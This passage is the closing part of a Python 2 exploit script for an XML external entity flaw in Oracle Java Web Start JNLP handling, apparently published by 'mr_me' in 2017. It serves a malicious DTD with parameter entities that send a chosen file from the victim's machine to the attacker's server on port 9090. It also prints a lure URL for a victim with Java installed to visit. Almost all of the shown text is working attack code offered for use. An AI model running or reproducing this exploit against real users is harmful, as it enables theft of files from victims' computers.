<!ENTITY %% sp SYSTEM "http://%s:9090/si.xml">
%%sp;
%%param1;
%%exfil;
]>
""" % ip
self.wfile.write(message)
self.wfile.write('\n')
return
def banner():
return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n"""
if __name__ == '__main__':
print banner()
if len(sys.argv) != 2:
print "(+) usage: %s <file>" % sys.argv[0]
print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
sys.exit(1)
file = sys.argv[1]
# randomize incase we change payloads and browser caches
path = "".join(choice(lowercase) for i in range(10))
path += ".jnlp"
# interfaces
ints = ""
for i in ni.interfaces(): ints += "%s, " % i
interface = raw_input("(+) select your interface: %s: " % ints[:-2])
# get the ip from the interface
try:
ip = ni.ifaddresses(interface)[2][0]['addr']
except:
print "(-) no ip address associated with that interface!"
sys.exit(1)
print "jnlp://%s:9090/%s" % (ip, path)
try:
server = HTTPServer(('0.0.0.0', 9090), xxe)
print '(+) starting xxe server...'
print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
server.serve_forever()
except KeyboardInterrupt:
print '(+) shutting down the web server'
server.socket.close()